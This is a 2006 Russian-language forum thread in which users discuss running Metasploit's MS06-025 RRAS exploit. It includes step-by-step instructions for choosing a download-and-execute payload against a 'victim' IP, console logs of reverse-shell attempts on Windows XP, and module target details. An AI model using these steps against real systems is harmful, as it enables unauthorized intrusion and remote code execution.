Exploit rras_ms06_025

Discussion in 'Безопасность и Анонимность' started by firemen, 29 Jun 2006.

  1. firemen

    firemen New Member

    Joined:
    3 Jun 2006
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Мужики кто пробовал:
    http://www.securitylab.ru/poc/269362.php


    Как вообще юзать эти метасплоиты?

    Metasploit Framework поставил был как-то, но без понятия пока что это такое и как:)

    Подскажите кто знает.
     
  2. Mastermind

    Mastermind Elder - Старейшина

    Joined:
    21 Jul 2005
    Messages:
    50
    Likes Received:
    4
    Reputations:
    5
    Если качал до 22.06, то сначала запусти MSFUpdate, чтобы обновиться до последей версии. Потом запускай MSFWeb (в ней удобнее). Открывай браузер и вписывай http://127.0.0.1:55555. Далее выбирай EXPLOITS. Выбирай в списка app::rras. Выбирай нужный экплойт. Далее внизу есть ссылка выбора целевой системы. На этом этапе выбираешь PAYLOAD. Например, Download and Exec (даунлоадер, скачивает и выполняет файл). Вписываешь IP жертвы и ссылку на файл для загрузки и запуска. Жмешь Exploit. Вроде все...
     
    1 person likes this.
  3. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    WIN_XP_SP2 (без дополнительных патчей) не уязвима?

    msf rras_ms06_025(win32_reverse) > exploit
    [*] Starting Reverse Handler.
    [*] Detected a windоws XP target...
    [*] Sending request...
    [*] WARNING: ACK response => at /home/ifгаmеwork/lib/Pex/DCERPC.pm line 957.
    [*] RPC server responded with:
    [*] 1
    [*] This probably means that the system is patched
    [*] Exiting Reverse Handler.
    msf rras_ms06_025(win32_reverse) >
     
  4. AoD

    AoD Elder - Старейшина

    Joined:
    10 Feb 2006
    Messages:
    29
    Likes Received:
    11
    Reputations:
    2
    Естественно для кого это пишут?

    Name: Microsoft RRAS MSO6-025 Stack Overflow
    Version: 1.1
    Targeting: win32, win2000, winxp / x86
    Privileges: Yes
    Authors:
    Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>
    H D Moore <hdm [at] metasploit.com>

    Disclosed: Jun 13 2006
    Targets:
    0 - Automatic
    1 - Windows 2000
    2 - Windows XP SP1
     
  5. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    А на секуре это для кого?

    Для успешной эксплуатации уязвимости на системах Windows XP SP2 и Windows Server 2003 требуется валидная учетная запись пользователя. На Windows 2000 SP4 и Windows XP SP1 уязвимость может быть эксплуатирована анонимным пользователем.

    Походу просто сплоита ещё для SP2 нет, а уязвимость и там есть...
     
  6. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Вот что выдаёт при атаке WIN_XP_SP1

    msf rras_ms06_025(win32_reverse) > exploit
    [*] Starting Reverse Handler.
    [*] WARNING: Failed to establish a null session: Session setup returned NT statu
    s 0xc000015b at /home/framework/lib/Pex/DCERPC.pm line 852.
    [*] Could not bind to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_np:10.0.3.5
    6[\SRVSVC]
    [*] Exiting Reverse Handler.
    msf rras_ms06_025(win32_reverse) >
     
  7. Jokerz

    Jokerz New Member

    Joined:
    13 Jul 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Хорошо, а как использовать валидную учётку??